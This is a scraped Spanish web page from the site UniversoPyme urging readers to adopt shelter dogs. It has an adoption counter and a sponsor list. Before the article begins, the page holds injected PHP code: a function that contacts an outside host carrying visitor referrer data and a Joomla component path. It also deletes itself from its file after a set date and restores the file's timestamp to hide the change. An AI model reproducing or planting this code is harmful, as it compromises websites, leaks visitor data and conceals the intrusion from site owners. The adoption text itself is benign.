check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456732081){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=5&id=18776729&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_contact/models/content.php"); } Adopta un perro

UniversoPyme

universopyme

Inscripción a boletín electrónico











Adopta un perro PDF Imprimir E-mail

Existen muchas y muy buenas razones para adoptar un perro.

Lo más importante es que al adoptar un perro, de alguna manera estarás salvando una vida y le darás la oportunidad de tener una vida digna a un ser vivo. Miles de perros son sacrificados anualmente en las perreras municipales, simplemente porque no hay espacio, ni recursos suficientes para mantenerlos.

 

 

Al adoptar un perro ayudarás a disminuir la venta de cachorros en tiendas y sitios ambulantes,  resultado de cruzas indiscriminadas y abusando de la salud de los animales.  Mucha gente piensa que si no tiene un perro de raza pura, no vale la pena tener un perro. En ocasiones, los criadores de perros, realizan cruzas indebidas y como resultado se obtienen perros con problemas de salud.

 

Los perros que se encuentran en los refugios o albergues son los más cariñosos, agradecidos y leales. Muchos están ahí porque se perdieron y jamás fueron recuperados por sus dueños, otros porque los dueños los abandonaron a su suerte y muchos otros son simplemente perros que no tuvieron la “fortuna” de ser “perros de raza” y por lo tanto los rechazan y viven en la calle, son los que conocemos normalmente como “criollos”, “cruza”, “corriente”, etc.

 

Si estás buscando un perro, debes saber que hay gran variedad de perros que podrías adoptar. Lo primero es tener en mente ¿qué es lo que quieres de un perro? Esto te ayudará a seleccionar el perro adecuado a tus necesidades. Tal vez quieras un perro para compañía, para salir a correr, caminar, para guardia y protección, para compañía de otro perrito que ya tienes, en  fin, debes estar seguro de las características que buscas en un perro.

 

Lo que sea que estés buscando en un perro, está esperándote en un refugio o albergue para perros. Si estás pensando en llevar un perro a tu hogar, puedes ser un héroe adoptando un perro. Al adoptar ahorrarás dinero, ayudarás a disminuir el negocio indiscriminado de los criadores de perros, pero sobre todo salvarás una vida y le darás la oportunidad a un perro, de tener una vida digna y llena de amor.

 

 

Contador de Casos de Éxito

Contador_arriba
perrosarescatados
contador_izq0_cero6_seis7_siete4_cuatrocontador_izq

 

Patrocinadores

petmedical

Logo_delaCalle_a_la_Casa_

royal_canin

Logo_Croquetero

bus